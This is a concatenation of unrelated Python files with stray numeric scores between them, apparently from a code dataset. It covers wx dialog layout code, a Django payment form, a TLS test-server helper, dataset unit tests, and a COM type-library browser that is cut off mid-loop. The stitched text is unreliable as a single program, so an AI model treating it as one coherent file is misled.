fgSizer242.AddGrowableRow( 0 ) fgSizer242.AddGrowableRow( 2 ) fgSizer242.SetFlexibleDirection( wx.BOTH ) fgSizer242.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_animCtrl = wx.animate.AnimationCtrl( self, wx.ID_ANY, wx.animate.NullAnimation, wx.DefaultPosition, wx.DefaultSize, wx.animate.AC_DEFAULT_STYLE|wx.NO_BORDER ) self.m_animCtrl.SetInactiveBitmap( wx.NullBitmap ) fgSizer242.Add( self.m_animCtrl, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 ) self.m_staticText112 = wx.StaticText( self, wx.ID_ANY, u"Please wait ...", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText112.Wrap( -1 ) fgSizer242.Add( self.m_staticText112, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer242.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer242 ) self.Layout() self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class ImportProject ########################################################################### class ImportProject ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Import project", pos = wx.DefaultPosition, size = wx.Size( 429,339 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer178 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer178.AddGrowableCol( 0 ) fgSizer178.AddGrowableRow( 1 ) fgSizer178.SetFlexibleDirection( wx.BOTH ) fgSizer178.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer233 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer233.AddGrowableCol( 1 ) fgSizer233.SetFlexibleDirection( wx.BOTH ) fgSizer233.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText110 = wx.StaticText( self, wx.ID_ANY, u"base directory", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText110.Wrap( -1 ) fgSizer233.Add( self.m_staticText110, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_dirPicker2 = wx.DirPickerCtrl( self, wx.ID_ANY, 
wx.EmptyString, u"Select a folder", wx.DefaultPosition, wx.DefaultSize, wx.DIRP_DEFAULT_STYLE|wx.DIRP_DIR_MUST_EXIST|wx.DIRP_USE_TEXTCTRL ) fgSizer233.Add( self.m_dirPicker2, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer178.Add( fgSizer233, 1, wx.EXPAND, 5 ) self.m_choicebook4 = wx.Choicebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.CHB_DEFAULT ) self.m_panel29 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer183 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer183.AddGrowableCol( 0 ) fgSizer183.AddGrowableRow( 0 ) fgSizer183.SetFlexibleDirection( wx.BOTH ) fgSizer183.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) m_checkList6Choices = [] self.m_checkList6 = wx.CheckListBox( self.m_panel29, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_checkList6Choices, 0 ) fgSizer183.Add( self.m_checkList6, 0, wx.ALL|wx.EXPAND, 5 ) self.m_panel29.SetSizer( fgSizer183 ) self.m_panel29.Layout() fgSizer183.Fit( self.m_panel29 ) self.m_choicebook4.AddPage( self.m_panel29, u"python", False ) self.m_panel28 = wx.Panel( self.m_choicebook4, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer182 = wx.FlexGridSizer( 0, 2, 0, 0 ) fgSizer182.SetFlexibleDirection( wx.BOTH ) fgSizer182.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_panel28.SetSizer( fgSizer182 ) self.m_panel28.Layout() fgSizer182.Fit( self.m_panel28 ) self.m_choicebook4.AddPage( self.m_panel28, u"c++", False ) fgSizer178.Add( self.m_choicebook4, 1, wx.ALL|wx.EXPAND, 5 ) fgSizer159 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer159.AddGrowableCol( 1 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer159.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer12 = wx.StdDialogButtonSizer() self.m_sdbSizer12OK = wx.Button( 
self, wx.ID_OK ) m_sdbSizer12.AddButton( self.m_sdbSizer12OK ) self.m_sdbSizer12Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer12.AddButton( self.m_sdbSizer12Cancel ) m_sdbSizer12.Realize(); fgSizer159.Add( m_sdbSizer12, 1, wx.EXPAND, 5 ) fgSizer178.Add( fgSizer159, 1, wx.EXPAND, 5 ) self.SetSizer( fgSizer178 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_sdbSizer12Cancel.Bind( wx.EVT_BUTTON, self.OnCancel ) self.m_sdbSizer12OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnCancel( self, event ): event.Skip() def OnOK( self, event ): event.Skip()
0.071267
from django import forms from decimal import * from django.core.validators import RegexValidator class CheckoutForm(forms.Form): amount = forms.DecimalField( label = 'Amount ($)', min_value = Decimal('0.50'), decimal_places = 2, required = True, ) description = forms.CharField( label = 'Description (Optional)', required = False, ) feepayment = forms.ChoiceField( label = 'Transaction fee', required = True, choices = ( ('absorb', 'Absorb'), ('transmit', 'Transmit'), ), widget = forms.RadioSelect, initial = 'absorb' ) card = forms.ChoiceField( label = 'Card', required = False, choices = ( ('dom', 'Domestic'), ('intl', 'International'), ), widget = forms.RadioSelect, initial = 'dom' ) class PaymentForm(forms.Form): # Do not require number, exp or cvc # Because Stripe takes these and produces a token # When a token is ready, they are no longer required. number = forms.CharField( required = False, label = 'Card number', max_length = 20 ) exp = forms.CharField( required = False, label = 'Expiry (MM/YY)', max_length = 7 ) cvc = forms.CharField( required = False, label = 'CVC', max_length = 4 ) email = forms.EmailField( required = False, min_length=3, label = 'Email, for receipt delivery (Optional)', ) postcode = forms.CharField( required = False, label = 'Postcode', )
0.048747
from __future__ import (absolute_import, print_function, division) import threading from six.moves import queue from io import StringIO import OpenSSL from netlib import tcp from netlib import tutils class _ServerThread(threading.Thread): def __init__(self, server): self.server = server threading.Thread.__init__(self) def run(self): self.server.serve_forever() def shutdown(self): self.server.shutdown() class _TServer(tcp.TCPServer): def __init__(self, ssl, q, handler_klass, addr, **kwargs): """ ssl: A dictionary of SSL parameters: cert, key, request_client_cert, cipher_list, dhparams, v3_only """ tcp.TCPServer.__init__(self, addr) if ssl is True: self.ssl = dict() elif isinstance(ssl, dict): self.ssl = ssl else: self.ssl = None self.q = q self.handler_klass = handler_klass if self.handler_klass is not None: self.handler_klass.kwargs = kwargs self.last_handler = None def handle_client_connection(self, request, client_address): h = self.handler_klass(request, client_address, self) self.last_handler = h if self.ssl is not None: cert = self.ssl.get( "cert", tutils.test_data.path("data/server.crt")) raw_key = self.ssl.get( "key", tutils.test_data.path("data/server.key")) key = OpenSSL.crypto.load_privatekey( OpenSSL.crypto.FILETYPE_PEM, open(raw_key, "rb").read()) if self.ssl.get("v3_only", False): method = OpenSSL.SSL.SSLv3_METHOD options = OpenSSL.SSL.OP_NO_SSLv2 | OpenSSL.SSL.OP_NO_TLSv1 else: method = OpenSSL.SSL.SSLv23_METHOD options = None h.convert_to_ssl( cert, key, method=method, options=options, handle_sni=getattr(h, "handle_sni", None), request_client_cert=self.ssl.get("request_client_cert", None), cipher_list=self.ssl.get("cipher_list", None), dhparams=self.ssl.get("dhparams", None), chain_file=self.ssl.get("chain_file", None), alpn_select=self.ssl.get("alpn_select", None) ) h.handle() h.finish() def handle_error(self, connection, client_address, fp=None): s = StringIO() tcp.TCPServer.handle_error(self, connection, client_address, s) self.q.put(s.getvalue()) 
class ServerTestBase(object): ssl = None handler = None addr = ("localhost", 0) @classmethod def setup_class(cls, **kwargs): cls.q = queue.Queue() s = cls.makeserver(**kwargs) cls.port = s.address.port cls.server = _ServerThread(s) cls.server.start() @classmethod def makeserver(cls, **kwargs): return _TServer(cls.ssl, cls.q, cls.handler, cls.addr, **kwargs) @classmethod def teardown_class(cls): cls.server.shutdown() def teardown(self): self.server.server.wait_for_silence() @property def last_handler(self): return self.server.server.last_handler
0
from tempfile import NamedTemporaryFile import numpy import pytest import theano from decorator import contextmanager from lasagne.utils import floatX from .data import DataSet, cifar, cifar_lee14, mnist, mnist_distractor, \ svhn, svhn_huang16 def identical_dataset(set1, set2, max_bs=500): lenght = len(set1.data) batchsize = next(i for i in range(max_bs, 0, -1) if lenght % i == 0) assert lenght == len(set2.data) for (x1, y1), (x2, y2) in zip(set1.iter(batchsize), set2.iter(batchsize)): assert numpy.allclose(x1, x2) assert numpy.all(y1 == y2) return True @contextmanager def from_state_file(dataset, frmt='npz', **kwargs): tmp = NamedTemporaryFile(suffix=f'.{frmt}') try: dataset.save_state(tmp.name, **kwargs) yield type(dataset).from_state(tmp.name) finally: tmp.close() def check_data(data): assert hasattr(data, 'data') assert hasattr(data, 'labels') assert hasattr(data, 'set') assert data.set == (data.data, data.labels) return True def check_dims(data, data_shape): length = data_shape[0] assert data.data.shape == data_shape assert data.labels.shape == (length, ) assert len(data.data) == length assert len(data.labels) == length return True def check_interval(data, lmin, lmax, soft=False): lmin, lmax = floatX(lmin), floatX(lmax) if soft: return numpy.min(data) >= lmin and numpy.max(data) <= lmax return numpy.min(data) == lmin and numpy.max(data) == lmax class Simple(): @staticmethod def identical_data(baseline, copy): assert identical_dataset(baseline.training, copy.training) assert identical_dataset(baseline.validation, copy.validation) return True def test_create(self): dataset = self.dataset_cls() assert dataset.training assert check_data(dataset.training) assert dataset.validation assert check_data(dataset.validation) assert dataset.test is None def test_dims(self): dataset = self.dataset_cls() assert check_dims(dataset.training, self.train_shape) assert check_dims(dataset.validation, self.valid_shape) def test_dtypes(self): dataset = self.dataset_cls() data = 
dataset.training.data[:] assert data.dtype == theano.config.floatX assert dataset.training.labels.dtype == numpy.dtype('int32') data = dataset.validation.data[:] assert data.dtype == theano.config.floatX assert dataset.validation.labels.dtype == numpy.dtype('int32') def test_state(self): dataset = self.dataset_cls() state = dataset.state assert state assert isinstance(state, dict) assert 'training' in state assert state['training'] assert isinstance(state['training'], dict) assert 'validation' in state assert state['validation'] assert isinstance(state['validation'], dict) assert 'test' not in state def test_from_state(self): dataset = self.dataset_cls() copy = self.dataset_cls.from_state(dataset.state) assert self.identical_data(dataset, copy) def test_from_state_iter(self): dataset = self.dataset_cls() for _ in dataset.training.iter(100): pass copy = self.dataset_cls.from_state(dataset.state) assert self.identical_data(dataset, copy) def test_from_state_file_numpy(self): dataset = self.dataset_cls() with from_state_file(dataset) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_numpy_compressed(self): dataset = self.dataset_cls() with from_state_file(dataset, compression=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_chunked(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', chunks=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_lzf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf') as copy: assert self.identical_data(dataset, copy) def 
test_from_state_file_h5_szip(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='szip') as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip_0(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip', compression_opts=0) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_gzip_9(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='gzip', compression_opts=9) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_shuffle(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_shuffle_lzf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf', shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_fletcher32(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', fletcher32=True) as copy: assert self.identical_data(dataset, copy) def test_from_state_file_h5_someconf(self): dataset = self.dataset_cls() with from_state_file(dataset, frmt='h5', compression='lzf', fletcher32=True, shuffle=True) as copy: assert self.identical_data(dataset, copy) def test_all_labels(self): dataset = self.dataset_cls() labels = numpy.concatenate((dataset.training.labels, dataset.validation.labels)) labels = set(labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_train_labels(self): dataset = self.dataset_cls() labels = set(dataset.training.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_valid_labels(self): dataset = self.dataset_cls() labels = set(dataset.validation.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == 
tuple(sorted(labels)) def test_interval(self): dataset = self.dataset_cls() assert check_interval(dataset.training.data, 0, 1) assert check_interval(dataset.validation.data, 0, 1) dataset = self.dataset_cls(interval=None) assert check_interval(dataset.training.data, *self.interval, soft=True) assert check_interval(dataset.validation.data, *self.interval, soft=True) dataset = self.dataset_cls(interval=(-1, 1)) assert check_interval(dataset.training.data, -1, 1) assert check_interval(dataset.validation.data, -1, 1) dataset = self.dataset_cls(interval=(-7, -1)) assert check_interval(dataset.training.data, -7, -1) assert check_interval(dataset.validation.data, -7, -1) dataset = self.dataset_cls(interval=(3.5, 4.4)) assert check_interval(dataset.training.data, 3.5, 4.4) assert check_interval(dataset.validation.data, 3.5, 4.4) dataset = self.dataset_cls(interval=(-3, 0)) assert check_interval(dataset.training.data, -3, 0) assert check_interval(dataset.validation.data, -3, 0) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(2, -1)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(-6, -12)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(0, 0)) with pytest.raises(ValueError): dataset = self.dataset_cls(interval=(1, 1)) class SplitNumber(Simple): def test_create(self): super(SplitNumber, self).test_create() dataset = self.dataset_cls(testsplit=100) assert dataset.test dataset = self.dataset_cls(testsplit=None) assert dataset.test is None dataset = self.dataset_cls(testsplit=0) assert dataset.test is None dataset = self.dataset_cls(testsplit=0.2) assert dataset.test with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=-0.4) with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=-200) with pytest.raises(ValueError): dataset = self.dataset_cls(testsplit=1000000000) def test_dims(self): super(SplitNumber, self).test_dims() dataset = self.dataset_cls(testsplit=100) train_shape = 
(self.train_shape[0] - 100, ) + self.train_shape[1:] test_shape = (100, ) + self.train_shape[1:] assert check_dims(dataset.training, train_shape) assert check_dims(dataset.test, test_shape) dataset = self.dataset_cls(testsplit=0.2) split = int(0.2 * self.train_shape[0]) train_shape = (self.train_shape[0] - split, ) + self.train_shape[1:] test_shape = (split, ) + self.train_shape[1:] assert check_dims(dataset.training, train_shape) assert check_dims(dataset.test, test_shape) def test_dtypes(self): super(SplitNumber, self).test_dtypes() dataset = self.dataset_cls(testsplit=100) data = dataset.test.data[:] assert data.dtype == theano.config.floatX assert dataset.test.labels.dtype == numpy.dtype('int32') def test_state(self): super(SplitNumber, self).test_state() dataset = self.dataset_cls(testsplit=100) assert dataset.state['test'] assert isinstance(dataset.state['test'], dict) dataset = self.dataset_cls(testsplit=None) assert 'test' not in dataset.state dataset = self.dataset_cls(testsplit=0) assert 'test' not in dataset.state dataset = self.dataset_cls(testsplit=0.2) assert dataset.state['test'] assert isinstance(dataset.state['test'], dict) def test_from_state(self): super(SplitNumber, self).test_from_state() dataset = self.dataset_cls(testsplit=100) copy = self.dataset_cls.from_state(dataset.state) assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def test_from_state_file_numpy(self): super(SplitNumber, self).test_from_state_file_numpy() dataset = self.dataset_cls(testsplit=100) with from_state_file(dataset) as copy: assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def test_from_state_file_h5(self): super(SplitNumber, self).test_from_state_file_h5() dataset = self.dataset_cls(testsplit=100) with from_state_file(dataset, frmt='h5') as copy: assert identical_dataset(dataset.training, copy.training) assert identical_dataset(dataset.test, copy.test) def 
test_interval(self): super(SplitNumber, self).test_interval() dataset = self.dataset_cls(testsplit=100) assert check_interval(dataset.training.data, 0, 1, soft=True) assert check_interval(dataset.test.data, 0, 1, soft=True) dataset = self.dataset_cls(interval=None, testsplit=0.1) assert check_interval(dataset.training.data, *self.interval, soft=True) assert check_interval(dataset.test.data, *self.interval, soft=True) dataset = self.dataset_cls(interval=(-1, 1), testsplit=0.1) assert check_interval(dataset.training.data, -1, 1, soft=True) assert check_interval(dataset.test.data, -1, 1, soft=True) dataset = self.dataset_cls(interval=(-7, -1), testsplit=150) assert check_interval(dataset.training.data, -7, -1, soft=True) assert check_interval(dataset.test.data, -7, -1, soft=True) dataset = self.dataset_cls(interval=(3.5, 4.4), testsplit=200) assert check_interval(dataset.training.data, 3.5, 4.4, soft=True) assert check_interval(dataset.test.data, 3.5, 4.4, soft=True) dataset = self.dataset_cls(interval=(-3, 0), testsplit=0.2) assert check_interval(dataset.training.data, -3, 0, soft=True) assert check_interval(dataset.test.data, -3, 0, soft=True) class SplitValid(Simple): def test_create(self): super(SplitValid, self).test_create() dataset = self.dataset_cls(testsplit='validation') assert dataset.test assert dataset.validation assert dataset.test is dataset.validation def test_state(self): super(SplitValid, self).test_state() dataset = self.dataset_cls(testsplit='validation') state = dataset.state assert state['test'] == 'validation' def test_from_state(self): super(SplitValid, self).test_from_state() dataset = self.dataset_cls(testsplit='validation') copy = self.dataset_cls.from_state(dataset.state) assert copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) def test_from_state_file_numpy(self): super(SplitValid, self).test_from_state_file_numpy() dataset = self.dataset_cls(testsplit='validation') with from_state_file(dataset) as copy: assert 
copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) def test_from_state_file_h5(self): super(SplitValid, self).test_from_state_file_h5() dataset = self.dataset_cls(testsplit='validation') with from_state_file(dataset, frmt='h5') as copy: assert copy.test is copy.validation assert identical_dataset(dataset.test, copy.test) class Base(SplitNumber, SplitValid, Simple): pass class AlwaysTestSet(Simple): @staticmethod def identical_data(baseline, copy): assert identical_dataset(baseline.training, copy.training) assert identical_dataset(baseline.test, copy.test) assert identical_dataset(baseline.validation, copy.validation) return True def test_testsplit(self): with pytest.raises(ValueError): self.dataset_cls(testsplit=0.1) def test_create(self): dataset = self.dataset_cls() assert dataset.training assert check_data(dataset.training) assert dataset.validation assert check_data(dataset.validation) assert dataset.test assert check_data(dataset.test) def test_dims(self): dataset = self.dataset_cls() assert check_dims(dataset.training, self.train_shape) assert check_dims(dataset.test, self.test_shape) assert check_dims(dataset.validation, self.valid_shape) def test_dtypes(self): dataset = self.dataset_cls() data = dataset.training.data[:] assert data.dtype == theano.config.floatX assert dataset.training.labels.dtype == numpy.dtype('int32') data = dataset.test.data[:] assert data.dtype == theano.config.floatX assert dataset.test.labels.dtype == numpy.dtype('int32') data = dataset.validation.data[:] assert data.dtype == theano.config.floatX assert dataset.validation.labels.dtype == numpy.dtype('int32') def test_all_labels(self): dataset = self.dataset_cls() labels = numpy.concatenate((dataset.training.labels, dataset.test.labels, dataset.validation.labels)) labels = set(labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_test_labels(self): dataset = self.dataset_cls() labels = 
set(dataset.test.labels) assert len(labels) == self.num_labels assert tuple(range(len(labels))) == tuple(sorted(labels)) def test_state(self): dataset = self.dataset_cls() state = dataset.state assert state assert isinstance(state, dict) assert 'training' in state assert state['training'] assert isinstance(state['training'], dict) assert 'validation' in state assert state['validation'] assert isinstance(state['validation'], dict) assert 'test' in state assert state['test'] assert isinstance(state['test'], dict) def check_dict(dct): assert isinstance(dct, dict) def check(prefix): x_key = f'{prefix} data' y_key = f'{prefix} labels' assert x_key in dct assert y_key in dct x_val = dct[x_key] y_val = dct[y_key] assert x_val.shape[0] == y_val.shape[0] assert len(x_val) == len(y_val) return True assert check('training') assert check('validation') return True class RealMixin(): def test_download(self): pytest.skip() def test_extract(self): dataset = self.dataset_cls() assert check_dict(dataset.extract()) def test_load(self): dataset = self.dataset_cls() assert check_dict(dataset.load()) class Real(RealMixin, Base): pass class ExampleDataSet(DataSet): """Example data set for testing.""" def download(*args, **kwargs): pass def extract(self, *args, **kwargs): return { 'training data': numpy.random.uniform(0, 256, (1000, 1, 16, 16)), 'training labels': numpy.random.uniform(0, 10, 1000), 'validation data': numpy.random.uniform(0, 256, (200, 1, 16, 16)), 'validation labels': numpy.random.uniform(0, 10, 200) } class TestExample(Base): dataset_cls = ExampleDataSet train_shape = (1000, 1, 16, 16) valid_shape = (200, 1, 16, 16) interval = (0, 256) num_labels = 10 class TestCIFAR10(Real): dataset_cls = cifar.CIFAR10 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) interval = (0, 255) num_labels = 10 class TestCIFAR100(Real): dataset_cls = cifar.CIFAR100 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) interval = (0, 255) num_labels = 100 class 
TestMNIST(Real): dataset_cls = mnist.MNIST train_shape = (60000, 1, 28, 28) valid_shape = (10000, 1, 28, 28) interval = (0, 255) num_labels = 10 class TestSVHN(Real): dataset_cls = svhn.SVHN train_shape = (73257, 3, 32, 32) valid_shape = (26032, 3, 32, 32) interval = (0, 255) num_labels = 10 class TestFullSVHN(RealMixin, Simple): dataset_cls = svhn.FullSVHN train_shape = (604388, 3, 32, 32) valid_shape = (26032, 3, 32, 32) interval = (0, 255) num_labels = 10 def test_interval(self): pytest.skip() def test_from_state_file_numpy(self): pytest.skip() def test_from_state_file_numpy_compressed(self): pytest.skip() class TestMNISTDistractor(Real): dataset_cls = mnist_distractor.Distractor train_shape = (60000, 1, 28, 56) valid_shape = (10000, 1, 28, 56) interval = (0, 255) num_labels = 2 class TestAugCIFAR10(Real): dataset_cls = cifar_lee14.CIFAR10 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) num_labels = 10 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) class TestAugCIFAR100(Real): dataset_cls = cifar_lee14.CIFAR100 train_shape = (50000, 3, 32, 32) valid_shape = (10000, 3, 32, 32) num_labels = 100 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) class TestAugSVHN(RealMixin, AlwaysTestSet): dataset_cls = svhn_huang16.Normalized train_shape = (598388, 3, 32, 32) test_shape = (6000, 3, 32, 32) valid_shape = (26032, 3, 32, 32) num_labels = 10 def test_interval(self): with pytest.raises(ValueError): self.dataset_cls(interval=(0, 1)) def test_from_state_file_numpy(self): pytest.skip() def test_from_state_file_numpy_compressed(self): pytest.skip()
0
"""A Pythonwin dialog for browsing the contents of a COM type library.

Three list boxes show the library's types, the selected type's members and
the selected method's parameter names; a list view shows detail key/value
pairs for the current selection.
"""
import win32ui
import win32con
import win32api
import commctrl
import pythoncom
from pywin.mfc import dialog

class TLBrowserException(Exception):
    "TypeLib browser internal error"

# Historic alias for the exception type (raised by _GetRealMemberPos).
error = TLBrowserException

# Pre-combined window styles used by the dialog template in GetTemplate().
FRAMEDLG_STD = win32con.WS_CAPTION | win32con.WS_SYSMENU
SS_STD = win32con.WS_CHILD | win32con.WS_VISIBLE
BS_STD = SS_STD | win32con.WS_TABSTOP
ES_STD = BS_STD | win32con.WS_BORDER
LBS_STD = ES_STD | win32con.LBS_NOTIFY | win32con.LBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL
CBS_STD = ES_STD | win32con.CBS_NOINTEGRALHEIGHT | win32con.WS_VSCROLL

# Human-readable names for the pythoncom TKIND_* type-kind constants.
typekindmap = {
    pythoncom.TKIND_ENUM : 'Enumeration',
    pythoncom.TKIND_RECORD : 'Record',
    pythoncom.TKIND_MODULE : 'Module',
    pythoncom.TKIND_INTERFACE : 'Interface',
    pythoncom.TKIND_DISPATCH : 'Dispatch',
    pythoncom.TKIND_COCLASS : 'CoClass',
    pythoncom.TKIND_ALIAS : 'Alias',
    pythoncom.TKIND_UNION : 'Union'
}

TypeBrowseDialog_Parent = dialog.Dialog

class TypeBrowseDialog(TypeBrowseDialog_Parent):
    "Browse a type library"

    # Dialog-control ids referenced both by the template and by GetDlgItem.
    IDC_TYPELIST = 1000
    IDC_MEMBERLIST = 1001
    IDC_PARAMLIST = 1002
    IDC_LISTVIEW = 1003

    def __init__(self, typefile = None):
        """Create the dialog; optionally pre-load the library at `typefile`.

        On a load failure self.tlb stays None and the user is told the file
        carries no type information.
        """
        TypeBrowseDialog_Parent.__init__(self, self.GetTemplate())
        try:
            if typefile:
                self.tlb = pythoncom.LoadTypeLib(typefile)
            else:
                self.tlb = None
        except pythoncom.ole_error:
            self.MessageBox("The file does not contain type information")
            self.tlb = None
        self.HookCommand(self.CmdTypeListbox, self.IDC_TYPELIST)
        self.HookCommand(self.CmdMemberListbox, self.IDC_MEMBERLIST)

    def OnAttachedObjectDeath(self):
        """Drop all COM references before the underlying window dies."""
        self.tlb = None
        self.typeinfo = None
        self.attr = None
        return TypeBrowseDialog_Parent.OnAttachedObjectDeath(self)

    def _SetupMenu(self):
        """Build the File menu (Open/Close) and hook its Open handler."""
        menu = win32ui.CreateMenu()
        flags = win32con.MF_STRING | win32con.MF_ENABLED
        menu.AppendMenu(flags, win32ui.ID_FILE_OPEN, "&Open...")
        menu.AppendMenu(flags, win32con.IDCANCEL, "&Close")
        mainMenu = win32ui.CreateMenu()
        mainMenu.AppendMenu(flags | win32con.MF_POPUP, menu.GetHandle(), "&File")
        self.SetMenu(mainMenu)
        self.HookCommand(self.OnFileOpen, win32ui.ID_FILE_OPEN)

    def OnFileOpen(self, id, code):
        """Prompt for a type-library file and (re)populate the dialog."""
        openFlags = win32con.OFN_OVERWRITEPROMPT | win32con.OFN_FILEMUSTEXIST
        fspec = "Type Libraries (*.tlb, *.olb)|*.tlb;*.olb|OCX Files (*.ocx)|*.ocx|DLL's (*.dll)|*.dll|All Files (*.*)|*.*||"
        dlg = win32ui.CreateFileDialog(1, None, None, openFlags, fspec)
        if dlg.DoModal() == win32con.IDOK:
            try:
                self.tlb = pythoncom.LoadTypeLib(dlg.GetPathName())
            except pythoncom.ole_error:
                self.MessageBox("The file does not contain type information")
                self.tlb = None
            self._SetupTLB()

    def OnInitDialog(self):
        """Cache control objects, create the detail columns, then load the TLB."""
        self._SetupMenu()
        self.typelb = self.GetDlgItem(self.IDC_TYPELIST)
        self.memberlb = self.GetDlgItem(self.IDC_MEMBERLIST)
        self.paramlb = self.GetDlgItem(self.IDC_PARAMLIST)
        self.listview = self.GetDlgItem(self.IDC_LISTVIEW)
        # Setup the listview columns
        itemDetails = (commctrl.LVCFMT_LEFT, 100, "Item", 0)
        self.listview.InsertColumn(0, itemDetails)
        itemDetails = (commctrl.LVCFMT_LEFT, 1024, "Details", 0)
        self.listview.InsertColumn(1, itemDetails)
        if self.tlb is None:
            # No library given at construction time; ask the user for one.
            self.OnFileOpen(None, None)
        else:
            self._SetupTLB()
        return TypeBrowseDialog_Parent.OnInitDialog(self)

    def _SetupTLB(self):
        """Clear all panes and fill the type list box from self.tlb."""
        self.typelb.ResetContent()
        self.memberlb.ResetContent()
        self.paramlb.ResetContent()
        self.typeinfo = None
        self.attr = None
        if self.tlb is None: return
        n = self.tlb.GetTypeInfoCount()
        for i in range(n):
            # GetDocumentation()[0] is the type's name.
            self.typelb.AddString(self.tlb.GetDocumentation(i)[0])

    def _SetListviewTextItems(self, items):
        """Replace the detail list view with (name, value) pairs from `items`."""
        self.listview.DeleteAllItems()
        index = -1
        for item in items:
            index = self.listview.InsertItem(index + 1, item[0])
            data = item[1]
            if data is None: data = ""
            self.listview.SetItemText(index, 1, data)

    def SetupAllInfoTypes(self):
        """Refresh the detail pane for the current type + member selection."""
        infos = self._GetMainInfoTypes() + self._GetMethodInfoTypes()
        self._SetListviewTextItems(infos)

    def _GetMainInfoTypes(self):
        """Detail rows for the selected type (GUID, help info, implemented types)."""
        pos = self.typelb.GetCurSel()
        if pos < 0: return []
        docinfo = self.tlb.GetDocumentation(pos)
        infos = [('GUID', str(self.attr[0]))]
        infos.append(('Help File', docinfo[3]))
        infos.append(('Help Context', str(docinfo[2])))
        try:
            infos.append(('Type Kind', typekindmap[self.tlb.GetTypeInfoType(pos)]))
        except:
            # Unknown/unmapped type kind -- just omit the row.
            pass
        info = self.tlb.GetTypeInfo(pos)
        attr = info.GetTypeAttr()
        infos.append(('Attributes', str(attr)))
        # attr[8] is the count of implemented types (cImplTypes).
        for j in range(attr[8]):
